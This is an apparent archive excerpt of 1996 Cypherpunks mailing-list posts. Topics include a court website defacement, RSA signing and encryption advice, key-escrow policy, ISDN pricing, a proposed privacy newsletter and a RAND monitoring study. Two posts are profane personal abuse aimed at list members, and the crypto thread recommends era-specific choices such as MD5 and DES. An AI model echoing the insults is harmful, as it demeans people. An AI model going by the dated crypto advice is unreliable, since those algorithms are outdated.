"symbolic language that could be physical or something of another order."

The arrest of the rotund, boarded and jovial 47-year

old philosophy professor at Venezuela Central University was treated as
front-page news by the mainstream daily newspaper El Nacional and other
media.

Government officials, perhaps a little embarrassed, played down the incident.

"He's not accused of anything," Interior Minister Jose Guillermo Andueza
said tersely. Political police merely wanted to know "what basis he has for
making this kind of statement."

Gomez, an academic with postgraduate degrees in history, education,
psychology and philosophy from three Venezuela universities, said he meant
Caldera no wrong and, in fact, voted for Caldera for his first term in
1968.

"I wish the president good health. I'm not betting on his sicknesses, much
less on his death," Gomez said in an interview in his home two hours after
his release. "It's just that from an astrological point of view, 1997 looks
dark for Caldera."

Gomez spoke publicly on the topic at a conference of businessmen on Oct. 12.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Blake Wehlage <jwilk@iglou.com>
Date: Sun, 27 Oct 1996 08:58:46 -0800 (PST)
To: cypherpunks@toad.com
Subject: Florida Supreme Court Home Page Adorned With Porn
Message-ID: <m0vHYXm-000bLHC@relay.iglou.com>
MIME-Version: 1.0
Content-Type: text/plain


Florida Supreme Court Home Page Adorned With Porn

TALLAHASSEE, Fla (Reuter) - A Florida court's Web page was restored Friday
after two days'
absence following a break-in by a hacker who placed pornographic images on
the site. 

Court officials Wednesday took the state court system home page off-line
after a computer hacker
apparently broke into the site and added pictures of nude men and women in
various stages of
sexual activity. 

The photos caused a stir among those who use the court page to access
Florida Supreme Court and
Appellate Court decisions. The home page is normally a little more staid,
with a plain wood-grained
background and hypertext links. 

Prurient, but disappointed, surfers looking for thrills on the net gave the
court system home page one
of its busiest days ever Friday. 

"We've had a significant number of hits today on our home page," said Craig
Waters, executive
assistant to Florida Supreme Court Chief Justice Gerald Kogan. "With all the
publicity surrounding
this, a lot of people are curious." 

No files were tampered with and court records remained intact, Waters said.
The Florida
Department of Law Enforcement was contacted and was investigating the break in. 

Court officials intend to prosecute the perpetrator, Waters said.

 
==========================================
   Blake Wehlage <jwilk@iglou.com>
   ‡±" RëVðLû¡ØÑ Bø+ (c)ÖmP@ñ¥ (tm) "±‡
 Goto: http://members.iglou.com/jwilk
 *********PGP KEY On Request*********





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Mark M." <markm@voicenet.com>
Date: Sun, 27 Oct 1996 08:23:28 -0800 (PST)
To: jk@stallion.ee>
Subject: Re: some RSA questions
In-Reply-To: <Pine.GSO.3.93.961027154749.25956C-100000@nebula>
Message-ID: <Pine.LNX.3.95.961027121320.180A-100000@gak.voicenet.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On Sun, 27 Oct 1996, Jüri Kaljundi wrote:

> The question is easy: how should I sign and encrypt the message?
> 
> 1) calculate a digest (MD5, SHA) from the message, sign the digest (or
> should I sign the message contents + digest) with Bob's private key and
> encrypt it with Alice's public key?

This is the best way.  The message plus the signature should be encrypted
using a symmetric algorithm and encrypt the key with Alice's public key.
All RSA encryption and signing should be done according to the PKCS standard
to avoid several nasty attacks that are successful if plain RSA is used.

> 2) is there any idea to generate a DES key, encrypt the message with the
> DES key, calculate a digest on (enc. message + DES key), sign the digest
> and encrypt it with Alice's public key? The message is small, so the time
> it takes to encrypt the message is not so important compared to higher
> speed of DES.

It is generally not a good idea to sign an encrypted message.  The signature
should be calculated on the plaintext, not ciphertext.

> 3) may be it would be good to encrypt the message with Alice's public key,
> then generate a digest, sign the digest and then once more encrypt the
> whole thing with Alice's public key?

This has the same problem as #2.

> Using a DES session key helps in case someone would find out Alice's
> private key she uses to decrypt the message, but actually in this case it
> is not so important to hide the message contents (what is important are
> message integrity and sender authentication).
> 
> What are the suggestions what crypto package might I use: RSAref,
> crypto++, SSLeay or some other? 

SSLeay is pretty fast and does have code to use PKCS.  It probably doesn't make
that much of a difference.  RSAref isn't necessary; RSA isn't patented outside
the USA.  The other packages are faster and better than RSAref.

Mark
- -- 
finger -l for PGP key
PGP encrypted mail prefered.

-----BEGIN PGP SIGNATURE-----
Version: 2.6.3
Charset: noconv

iQEVAwUBMnOazizIPc7jvyFpAQEx3Qf+M0BnhAcis6qzcsaVyRYyU13xvZArlx6I
7zupsL8y/CozpIyvgo23qpEd8ShR0k+I+ZlqbpEuprFXEtC+i5cO8i+EECKY22i6
R/4aAer0jMKZdovnxI/IHZ6boLengf4AcO9RE6tVm0chMbHyfn+j0e8FjtVKAoQe
SPS+QHT6225ro62hoWWBcQtoL5ifbOn6lyIZk6lMGZzEnknXejLB/i5Uz5VMLyCh
rsB4zNkpO5NCyHHscW5CdCV800+J5qRyzWCMxEM8GVtXmhm2vciOgGHhypJW37T9
PFv9Mft2m+d2QAK9JosHaGEbVJ3zgGsqDrxmgqI+v6Sf8jceWKNw6A==
=pBlb
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Mark M." <markm@voicenet.com>
Date: Sun, 27 Oct 1996 08:29:11 -0800 (PST)
To: Cypherpunks <junger@pdj2-ra.F-REMOTE.CWRU.Edu>
Subject: Re: Fed Ct hrg re Diffie-Hellman & Hellman-Merkle patents
In-Reply-To: <199610271325.IAA22167@pdj2-ra.F-REMOTE.CWRU.Edu>
Message-ID: <Pine.LNX.3.95.961027122909.180B-100000@gak.voicenet.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On Sun, 27 Oct 1996, Peter D. Junger wrote:

> The server at www.cruzio.com reports:
> 
>   The requested URL /~schlafly was not found on this server.
> 
> Does anyone have a valid URL for this information?

bbs.cruzio.com/~schalfly works fine.

Mark
- -- 
finger -l for PGP key
PGP encrypted mail prefered.

-----BEGIN PGP SIGNATURE-----
Version: 2.6.3
Charset: noconv

iQEVAwUBMnOcLizIPc7jvyFpAQEXCwf9GqDbXvUp3Xgfpmix67nReN+ff4dX9qMl
dIOor4qJypZ00a62bAgp4QorBr6OduhQgZPYw22g3wnPbGpqC3w0LmbFca6WVfhA
P98sgWXYwvtXSWdPao3pxoMzYcZa2M/JkUOZw5dI1uJ6dv0qwDK1yMGoU3iM/ecY
br9uAb/6USYgiXI1pRrbWHLi8Mc5FlMelpJpjDIHiwrMsAnDEShvR1TgKyFQ3uwQ
E9n1rgm+QfucrlqaHAJLHvArZROFxvmIbzsouF3VU9lwdLJiRnaLdK1OB7rget75
XpMZZTQu7x0AxFtaobauK+hD57KaFgkxap60GFmpx0PqFG7s/WHgcQ==
=cX25
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Caspar Bowden <qualia@dircon.co.uk>
Date: Sun, 27 Oct 1996 04:46:46 -0800 (PST)
Subject: ANNOUNCE: Scientists for Labour encryption and escrow conf, Nov 14th,"Liberty on the Line"
Message-ID: <01BBC404.3894A6C0@qualia.dircon.co.uk>
MIME-Version: 1.0
Content-Type: text/plain


Full details: http://www.shef.ac.uk/~sfl/meetings/itconf.html

		PLEASE DISTRIBUTE AND LINK TO YOUR WEB-SITE: 

	Scientists for Labour - IT & Communications Group    
	  Conference on Information Superhighway Policy 

---------------------------------------------------------------------	
"Liberty on the Line : Opportunities and Dangers of the Superhighway" 
---------------------------------------------------------------------	

	Chaired by Geoff Hoon MP, Shadow Minister for IT 

	Thursday 14th November 1996, 9am - 5:30pm 
	
	MSF Centre, 33-37 Moreland Street, London EC1 (Angel tube) 
---------------------------------------------------------------------	

For further details or to reserve a place contact:
Caspar Bowden, SfL IT & Comms co-ordinator (qualia@dircon.co.uk)


The debate over Internet regulation in the UK has focused mainly on 
censorship, but the standards for control of "encryption keys", currently
being formulated nationally and internationally, will lay the permanent
foundations on which the Information Society is built. The long-term 
implications for civil liberties have received little public attention 
outside the Internet community.

Scientists for Labour is hosting a conference to look at the data protection 
and economic issues arising from the integration of digital signatures, 
electronic copyright management, and digital cash. What kind of regulatory 
apparatus will allow rapid growth of an information economy, but prevent 
misuse of personal data ? 

*) New government proposals on "Trusted Third Parties", which aim to preserve
   law enforcement and national security capabilities for warranted 
   interception of communications (to fight crime and terrorism), place only 
   procedural not technical limits on the scope of Superhighway surveillance. 

*) Super-computers have the potential to conduct random electronic "fishing 
   expeditions" against the whole population. Telephone and letter 
   interception cannot be automated : digital monitoring can. 

Will legal safeguards against abuse offer adequate protection in perpetuity, 
or can cryptographic protocols be designed which make Superhighway mass-
surveillance impossible, while still allowing criminals to be targeted ? 

Computer and legal policy experts will explain the principles of the 
different technologies, and the international and commercial context, in a 
search for interdisciplinary solutions. 

The attendance fee is ?5 (?2 unwaged ; SfL members free) 

For press information please contact : 
Bobbie Nicholls, SfL Press Officer, Fax: 01235 529172 

The Scientists for Labour home page (http://www.shef.ac.uk/~sfl/)
has information on how to join SfL, or contact the Secretary : 
Dr Robin Walters (R.G.Walters@shef.ac.uk) 


					Programme 
					---------

9.00-9.30	Registration	SfL members free, non-members ?5 (?2 unwaged)

9.30-9.45	Geoff Hoon MP 	Introduction 

9.45-10.45	Dr.John Leach 	Cryptography and developments in Trusted Third
					Party policy

10.45-11.45	Dr.Ross Anderson	Some problems with the Trusted Third Party 
					programme 

11.45-12.00	Coffee	

12.00-12.30	Simon Davies 	Escrow and the hidden threat to human rights
 					and privacy

12.30-1.00	Elizabeth France (Data Protection Registrar)

1.00-2.00	Buffet lunch	

2.00-2.45	Prof. Charles 	Public policy and legal aspects of Intellectual
		Oppenheim 		Property Rights 

2:45-3.30	Alistair Kelman 	Electronic Copyright Management : 
					Possibilities and Problems
3.30-3.45	Tea	

3:45-4:45	Andrew Graham 	Will the Information Superhighway enhance or
					diminish democracy ? 

4.45-5.30	Panel Session	Discussion (inc. Robert Schifreen)
---------------------------------------------------------------------	







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Graves <llurch@networking.stanford.edu>
Date: Sun, 27 Oct 1996 14:18:57 -0800 (PST)
To: Roger Williams <roger@coelacanth.com>
Subject: Re: Merc: PacBell predicts imminent death of the net; film at 11
In-Reply-To: <rogerbudpt6ef.fsf@trout.coelacanth.com>
Message-ID: <Pine.GUL.3.95.961027141657.9399D-100000@Networking.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain


On 26 Oct 1996, Roger Williams wrote:

> I caught an interview on the BBC last night with a representative from
> PacBell, who claimed that this subsidy resulted in ISPs actively
> discouraging customers from using data service (ISDN) instead of POTS.
> 
> Bwahahaha...

For more on this disinformation campaign, see the thread of same title in
ba.internet,alt.internet-media-overage.

-rich





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: stewarts@ix.netcom.com
Date: Sun, 27 Oct 1996 14:22:13 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Merc: PacBell predicts imminent death of the net; film at 11
Message-ID: <199610272222.OAA00395@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


At 10:47 PM 10/26/96 -0500, Roger Williams <roger@coelacanth.com> wrote:
>I caught an interview on the BBC last night with a representative from
>PacBell, who claimed that this subsidy resulted in ISPs actively
>discouraging customers from using data service (ISDN) instead of POTS.

For those of you not in PacBell territory, PacBell really misunderstood
the Internet access market when they set their current rates.
ISDN costs $X/month (about 2-3 x POTS) plus (daytime) per-minute charges
of 4 cents, (nighttime 7pm-7am) free.  (This probably requires that
your ISP have Centrex access in your local calling area.)
What they didn't realize was that computer people think 
"It's free at night" means "It's free at night", so they dial up and stay on.
(Many of us non-ISDN users do the same with POTS, of course.)

ISDN call setup times are fast enough that it's possible to
do IP support that tears down calls after X seconds of non-use
and sets them up again when there's traffic, which is practical
since you don't have 30 seconds of modem retraining time per setup.
If PacBell's really bugged enough about usage patterns, they could
go write a good Winsock package to support it themselves
and give it away free to ISDN customers....

#			Thanks;  Bill
# Bill Stewart, +1-415-442-2215 stewarts@ix.netcom.com
# You can get PGP outside the US at ftp.ox.ac.uk
  Imagine if three million people voted for somebody they _knew_,
  and the politicians had to count them all.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mark Allyn 206-860-9454 <allyn@allyn.com>
Date: Sun, 27 Oct 1996 16:15:42 -0800 (PST)
To: jwilk@iglou.com (Blake Wehlage)
Subject: Re: Florida Supreme Court Home Page Adorned With Porn
In-Reply-To: <m0vHYXm-000bLHC@relay.iglou.com>
Message-ID: <199610280020.QAA18138@mark.allyn.com>
MIME-Version: 1.0
Content-Type: text/plain


Did anyone catch a copy of the hacked page and put it on a mirror?




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Greg Broiles <gbroiles@netbox.com>
Date: Sun, 27 Oct 1996 16:25:00 -0800 (PST)
To: cypherpunks@toad.com
Subject: considering internet/privacy periodical
Message-ID: <3.0b28.32.19961027163228.006ad8a8@ricochet.net>
MIME-Version: 1.0
Content-Type: text/plain



I'm considering putting together a periodic publication about the technical
and legal aspects of privacy and the Internet. My "business model" would
feature free WWW/email access with a charge for fax or postal delivery. I'm
curious to know if this strikes people as interesting or just Yet Another
Email Newsletter Of No Real Consequence. (no offense taken if it's the
latter.)

Any feedback is appreciated. 

 
--
Greg Broiles                |  "We pretend to be their friends,
gbroiles@netbox.com         |   but they fuck with our heads."
http://www.io.com/~gbroiles |
                            |





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: =?ISO-8859-1?Q?J=FCri_Kaljundi?= <jk@stallion.ee>
Date: Sun, 27 Oct 1996 06:47:15 -0800 (PST)
To: cypherpunks@toad.com
Subject: some RSA questions
Message-ID: <Pine.GSO.3.93.961027154749.25956C-100000@nebula>
MIME-Version: 1.0
Content-Type: text/plain



Some questions about writing a program that uses RSA. 

Let's assume we have 3 participants (Alice, Bob, Carol). The idea is for
Bob to send an encrypted and signed message to Alice. Although Bob
constructs the message, signs it and encrypts it, it is Carol who can
decide some parts of the message.

The message is small, 200-400 bytes in length. Some of the contents of the
message are always the same (field names) and the message looks much like
mail headers: 

Field1Name: field1contents
Field2Name: field2contents
Field3Name: field3contents

Carol can decide, what goes into the field contents. 

Now the easiest way would be to sign the message using Bob's private key
and encrypt is using Alice's public key. What Carol wants to do is forge
similar messages without help from Bob and send the messages to Alice.
Let's say that Bob is a bank, Alice a merchant and Carol a buyer. Usually
Bob has to take some money from Carols account and after the he signals
Alice, that she can give the goods to Carol. Now Carol wants to get the
goods without paying and give a false signal to Alice (which Alice thinks
is a signal from Bob). Both the public keys of Alice and Bob are
well-known. One of the fields will be unique for every message, so that
Carol can not use the same message to pay once and recieve the goods many
times.

The question is easy: how should I sign and encrypt the message?

1) calculate a digest (MD5, SHA) from the message, sign the digest (or
should I sign the message contents + digest) with Bob's private key and
encrypt it with Alice's public key?

2) is there any idea to generate a DES key, encrypt the message with the
DES key, calculate a digest on (enc. message + DES key), sign the digest
and encrypt it with Alice's public key? The message is small, so the time
it takes to encrypt the message is not so important compared to higher
speed of DES.

3) may be it would be good to encrypt the message with Alice's public key,
then generate a digest, sign the digest and then once more encrypt the
whole thing with Alice's public key?

Using a DES session key helps in case someone would find out Alice's
private key she uses to decrypt the message, but actually in this case it
is not so important to hide the message contents (what is important are
message integrity and sender authentication).

What are the suggestions what crypto package might I use: RSAref,
crypto++, SSLeay or some other? 

--
Juri Kaljundi
jk@stallion.ee






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Arnaldo Giacomitti Junior <dunkelheit@geocities.com>
Date: Sun, 27 Oct 1996 12:08:41 -0800 (PST)
To: cypherpunks@toad.com
Subject: (no subject)
Message-ID: <3273CE73.32B3@geocities.com>
MIME-Version: 1.0
Content-Type: text/plain


unsuscribe cypherpunks




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rabid Wombat <wombat@mcfeely.bsfs.org>
Date: Sun, 27 Oct 1996 16:28:35 -0800 (PST)
To: Steve Schear <azur@netcom.com>
Subject: [NOISE][AP][NOISE]Re: Reason for AP anonymity
In-Reply-To: <v0213050fae98fa15d164@[10.0.2.15]>
Message-ID: <Pine.BSF.3.91.961027181728.10887D-100000@mcfeely.bsfs.org>
MIME-Version: 1.0
Content-Type: text/plain


> 
> Caldera's astrological chart ,show that "Uranus is over the sun, Pluto is
> in ascendancy and Mars is going behind its moon" - not a good sign for the
> president, Gomez told police.
> 

Yeah, when Uranus is over the sun, you're in for a bad hair day, at least.

-r.p.w.
(Rabid Psychic Wombat)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Sun, 27 Oct 1996 15:50:52 -0800 (PST)
To: cypherpunks@toad.com
Subject: HIT_key
Message-ID: <1.5.4.32.19961027234953.00683320@pop.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   10-24-96:

   "Hitachi, Fujitsu to develop key-code data security
   system."

      They will cooperate to develop "hack-proof" encryption
      for telecommunications networks. Planning for the
      system includes formation of a "bank" to maintain
      duplicates of decoding keys, an aspect which has
      raised some concern over potential invasions of
      privacy. The U.S. has been lobbying other nations to
      adopt such a system.

   "Singapore devises system to combat Internet business
   fraud."

      The new technology, known as the Singapore Enterprise
      Security Architecture (SESA), could be applied over
      the Internet "within the next few months" in
      Singapore. It may begin in Singapore first and then,
      depending on the response from those outside,
      overseas."

   Patent: "Computerized theme park information management
   system utilizing partitioned smart cards and biometric
   verification."

      Abstract: A computerized theme park information system
      to automatically process and issue a multi-service 
      guest card, control and monitor admission, *perform
      value-added manipulation of the guest card's contents
      and to analyze the visitor's buying behavior*.

   "U.S. Attorney Gen. Janet Reno offered to "set the record
   straight" on encryption policy and key recovery at FCBA
   lunch Oct. 17."

      RFI: Anybody know of a transcript of the AG's talk?

   -----

   http://jya.com/hitkey.txt  (7 kb for 4)

   ftp://jya.com/pub/incoming/hitkey.txt

   HIT_key

----------

   We have put Quisquater's "short cut for exhaustive key
   search using fault analysis" at:

   http://jya.com/quikey.htm












From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: azur@netcom.com (Steve Schear)
Date: Sun, 27 Oct 1996 19:08:46 -0800 (PST)
To: cypherpunks@toad.com
Subject: No Subject
Message-ID: <v02130500ae99ce6e2fc2@[10.0.2.15]>
MIME-Version: 1.0
Content-Type: text/plain


I came across some interesting passages in the RAND Corp. study, An
Exploration of Cyberspace Security R&D Investment Strategies for DARPA:
"The Day After ... in Cyberspace II", MR-797-DARPA.

http://www.rand.org/publications/MR/MR797

The report describes the results of an exercise sponsored by the Defense
Advanced Research Projects Agency (DARPA) using the RAND "The Day After..."
methodology to elicit the views of participants on research and investment
strategies addressing the security and safety of systems and networks
supporting various U.S. physical and functional infrastructures. The
exercise was held on March 23, 1996 in Washington D.C., and involved
approximately 60 participants from government, universities, and commercial
industries involved with the U.S. information infrastructure.

Has this report been discussed on the list?

----------------
Is it possible to "sterilize" data passing through our telecommunications
systems?

Billions of bits of data pass through our national information
infrastructure each second. Some of those bits represent information about
individual citizens' login and password combinations, social security and
credit card numbers, account information, health status, and innumerable
other sensitive information items. Our nation has superb communications
monitoring tools, housed primarily in the National Security Agency.
However, the NSA is precluded by law from collecting information about U.S.
citizens. When incidents of "information warfare" are being waged against
U.S. systems, could key data flows be "sterilized" or "sanitized" by
computer hardware and/or software in such a manner that the NSA could help
monitor and track perpetrators in cyberspace without violating these laws?
This topic was raised during exercise discussions. We have not studied all
the relevant laws and regulations to assess whether such sterilization
measures would allow the power of NSA's analyses to be brought to bear on
telecommunications involving U.S. citizens, but perhaps the topic merits
further investigation. If so, what kinds of pattern detection and
replacement algorithms would suffice to accomplish this goal?


Sponsor development of an aircraft-like "black box" recording device

When a cyberspace security incident happens, it is often not detected in
real time, and the trail back to the perpetrator becomes lost. Could a
"black box" recording device be developed, to be attached to key nodes or
links of cyberspace systems, that would record every transaction passing
through that node or link during the last n minutes (where n=5 or 10, for
example)? If so, that record would be invaluable in tracing the source of
incidents, whether they are accidental or deliberately perpetrated.
Thousands of such systems would be required to cover key links or nodes;
could they be made robust, inexpensive, and ultra-reliable?


PGP Fingerprint: FE 90 1A 95 9D EA 8D 61  81 2E CC A9 A4 4A FB A9
---------------------------------------------------------------------
Snoop Daty Data           | Internet: azur@netcom.com
Grinder                   |
Sacred Cow Meat Co.       |
---------------------------------------------------------------------

                          Hacker Opportunities
                          (Let's Make Lots Of Money)

I've got the brains, you've got the tricks
Let's make lots of money
You've got the code, I've got the hacks
Let's make lots of ...

I've had enough of scheming and messing `round with jerks
My crypto code's compiled, I'm afraid it doesn't work
I'm looking for a partner, someone who gets things fixed
Ask yourself this question: do you want to be rich?

I've got the brains, you've got the tricks
Let's make lots of money
You've got the code, I've got the hacks
Let's make lots of money

You can tell I'm educated, I studied at CalTech
Doctored in mathematics, I could've been set
I can program a computer, choose the perfect time
If you've got the inclination, I have got the crime

Ooooh, there's a lot of opportunities
If you know when to take them, you know
There's a lot of opportunities
If there aren't, you can make them (Make or break them)

I've got the brains, you've got the tricks
Let's make lots of money
Let's make lots of ...

You can see I'm single-minded, I know what I could be
How do you feel about it? Come, take a walk with me
I'm looking for a partner regardless of expense
Think about it seriously, you know it makes sense

Let's (Got the brains)
Make (Got the tricks)
Let's make lots of money (Money)
Let's (You've got the code)
Make (I've got the hacks)
Let's make lots of money (Money)
I've got the brains (Got the brains)
You've got the code (Got the hacks)
Let's make lots of money (Money)
Money! 






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Greg Broiles <gbroiles@netbox.com>
Date: Sun, 27 Oct 1996 19:09:43 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: considering internet/privacy periodical
Message-ID: <3.0b28.32.19961027192058.006eeea0@ricochet.net>
MIME-Version: 1.0
Content-Type: text/plain


At 07:31 PM 10/27/96 -0800, Tim May wrote:

>But Greg probably already knows about all these things. If he thinks
>there's a market, maybe there is.

Actually, I don't think there's enough of a market to justify a real
business; I don't see any serious $ here (in fact, there's probably very
little $ here). As far as I can tell, most of the money being made with the
Internet so far comes from selling things to people who think they can make
money on the Internet. My mention of a price comes from my impression that
there may be some folks who'd be interested - mostly law-oriented folks but
this is likely true of other "serious professionals/academics" - but who
have organized their information gathering practices around paper, such
that an electronic-only publication isn't "real" to them. But given my
relatively poor cash flow situation and the tendency of human beings to
sign up for anything that's free, I don't think it's a good idea to offer
free FAX or paper distribution, since those media choices would cost me per
subscriber. 

Mostly I see a hole right now in between the one-shot web pages/FAQs people
build which explain remailers (and other privacy technologies) and Raph's
remailer list, which is pretty tightly focused on the technical/reliability
aspects of cypherpunk-style remailers without providing a lot of historical
or technical context. (To clarify, I think both the FAQ's and Raph's
remailer reliability tracking are valuable, and I see them as inspirations
to also do something useful.) Also, the privacy/remailer market is
fragmenting (evolving), with pro-privacy (or faux pro-privacy, or
anti-privacy) mail receiving/forwarding services, viz c2.org, netbox.com,
pobox.com, thebook.com, mailmasher.com, hotmail.com, etc. 

I see it not as a business but more like a way of organizing what I'm
thinking about already in a way that might be interesting to others.


--
Greg Broiles                |  "We pretend to be their friends,
gbroiles@netbox.com         |   but they fuck with our heads."
http://www.io.com/~gbroiles |
                            |





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: se7en <se7en@dis.org>
Date: Sun, 27 Oct 1996 18:58:01 -0800 (PST)
To: cypherpunks@toad.com
Subject: Hey! Dr. Vuilis!
Message-ID: <Pine.BSI.3.91.961027191913.7416C-100000@kizmiaz.dis.org>
MIME-Version: 1.0
Content-Type: text/plain



SHUT THE FUCK UP, BITCH!!!

You think we can have at least one fucking week with having to listen to 
your clueless bullshit?  Or am I gonna have to put the slap down on you?

Rant like a bitch, get slapped like a bitch!

se7en




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: linefeed@juno.com (Leon W Samson)
Date: Sun, 27 Oct 1996 16:30:17 -0800 (PST)
To: dunkelheit@geocities.com
Subject: Re: (no subject)
In-Reply-To: <3273CE73.32B3@geocities.com>
Message-ID: <19961026.184550.12374.1.LineFeed@juno.com>
MIME-Version: 1.0
Content-Type: text/plain


hahahahahahahahaha learn to spell dumbass!!!!!hahahahahahahahah




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Timothy C. May" <tcmay@got.net>
Date: Sun, 27 Oct 1996 18:20:20 -0800 (PST)
To: Greg Broiles <cypherpunks@toad.com
Subject: Re: considering internet/privacy periodical
In-Reply-To: <3.0b28.32.19961027163228.006ad8a8@ricochet.net>
Message-ID: <v03007800ae99d428af92@[207.167.93.63]>
MIME-Version: 1.0
Content-Type: text/plain


At 4:36 PM -0800 10/27/96, Greg Broiles wrote:
>I'm considering putting together a periodic publication about the technical
>and legal aspects of privacy and the Internet. My "business model" would
>feature free WWW/email access with a charge for fax or postal delivery. I'm
>curious to know if this strikes people as interesting or just Yet Another
>Email Newsletter Of No Real Consequence. (no offense taken if it's the
>latter.)
>
>Any feedback is appreciated.

EXECTUTIVE SUMMARY (as they say): Don't do it. The world doesn't need yet
another cyberspace events newsletter, even one focussed on "legal aspects
of privacy and the Internet" (as if we don't have these already).



Inasmuch as I respect Greg's views, and inasmuch as he drove down from
Oregon for one of my parties, I'll make some comments.

I think we're _drowning_ in Net- and Web-based "zines," newsletters, hot
and hip sites, and crud. More than just Sturgeon's law, it's an explosion
of self-published crap. All well and good, as some may find something of
interest, or so the theory goes.

However, consider the meltdown in the "Wired Ventures" plans for an IPO:
cancelled on Friday for the second time in the past several months. The
chief underwriter reported a "lack of interest," even at the reduced
offering price. (A lot of Wired, HotWired, Suck, and other paperholders are
undoubtedly not too pleased.) No doubt "Wired" the magazine is doing well
(though not amongst many of _us_, it would seem--or at least that we
_admit_ here), but apparently "HotWired" and "Suck" and all the rest are
having trouble finding their niche. Ditto for Michael Kinsley's
massively-touted "Slate." And a bunch of other such Web rags (no pun
intended, but it's not a bad one, eh?).

The latest "Wired," in fact, has an article by Josh Quittner--known to we
Cypherpunks as the reporter who showed up at an early CP meeting, and wrote
about it for "Newsday"--on the adventures of the "Sucksters."
(www.suck.com, as I recall). Josh writes (and maybe runs, I only skimmed
the article in the bookstore, as I do with "Wired") for the "Netly News."
The article somewhat longwindedly gets into the problems these "hot sites"
are having. The lack of loyalty, the lack of _payment_, etc.

(And a comment I made many months ago, about how I routinely "don't even
see" the Web ads placed on Web pages, has since been vindicated by a study
showing that the payback for Web advertising is just not there; it appears
that a whole lot of other people besides me are oblivious to these ads.
This leaves almost no payment system for online journals and hot
sites....advertising doesn't work, people won't buy subscriptions...doesn't
leave much, does it?)

Declan writes for some of these Web rags, so he can provide even more
comments. He has his own list or zine, "Fight Censorship," so his views may
differ from mine.

But Greg probably already knows about all these things. If he thinks
there's a market, maybe there is.

But how would this differ from the mailings sent out by some of the folks
on the Cyberia-l list, and similar forums? The Cyberia-l list itself, the
site at the George Marshall Law School (Trubow, as I recall), various
mailings by David Post, and the flood of press releases, Web pages,
newswire stories, etc.?

Isn't yet another newsletter a bit of an anachronism in the age of search
engines, news services out the wazoo (and out the Yahoo), etc.

In short, it seems unnecessary. And it's unlikely to make enough money to
even pay the modem bill.

Just my opinion.

--Tim May


"The government announcement is disastrous," said Jim Bidzos,.."We warned IBM
that the National Security Agency would try to twist their technology."
[NYT, 1996-10-02]
We got computers, we're tapping phone lines, I know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^1,257,787-1 | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Timothy C. May" <tcmay@got.net>
Date: Sun, 27 Oct 1996 20:46:01 -0800 (PST)
To: cypherpunks@toad.com
Subject: Naive RAND study...
In-Reply-To: <v02130500ae99ce6e2fc2@[10.0.2.15]>
Message-ID: <v03007800ae99f9d25dd6@[207.167.93.63]>
MIME-Version: 1.0
Content-Type: text/plain


At 7:08 PM -0800 10/27/96, Steve Schear wrote:
>I came across some interesting passages in the RAND Corp. study, An
>Exploration of Cyberspace Security R&D Investment Strategies for DARPA:
>"The Day After ... in Cyberspace II", MR-797-DARPA.

>Has this report been discussed on the list?

Not that I recall. From the excerpts you included, it looks very naive, in
the sense of being unsophisticated. And the "NSA is forbidden by law" point
is a real howler; obviously the authors are unaware of Bamford's book, not
to mention other confirmations of NSA domestic intercepts.

...
>However, the NSA is precluded by law from collecting information about U.S.
>citizens. When incidents of "information warfare" are being waged against

>Sponsor development of an aircraft-like "black box" recording device
>
>When a cyberspace security incident happens, it is often not detected in
>real time, and the trail back to the perpetrator becomes lost. Could a
>"black box" recording device be developed, to be attached to key nodes or
>links of cyberspace systems, that would record every transaction passing
>through that node or link during the last n minutes (where n=5 or 10, for
>example)? If so, that record would be invaluable in tracing the source of
>incidents, whether they are accidental or deliberately perpetrated.
>Thousands of such systems would be required to cover key links or nodes;
>could they be made robust, inexpensive, and ultra-reliable?

Sure, with "traffic escrow," all traffic will be escrowed. Of course, there
are just a few minor problems with the Constitution saying one has to
escrow what's on one's computers without a warrant, and with privacy issues
galore. And there the minor issue of storage of all of these terabytes of
data....

But if RAND wants to get on the bucks being doled out over this
"information warfare" hype, they've got to put some of their best and
brightest new college grads to writing papers like this.

--Tim May

"The government announcement is disastrous," said Jim Bidzos,.."We warned IBM
that the National Security Agency would try to twist their technology."
[NYT, 1996-10-02]
We got computers, we're tapping phone lines, I know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
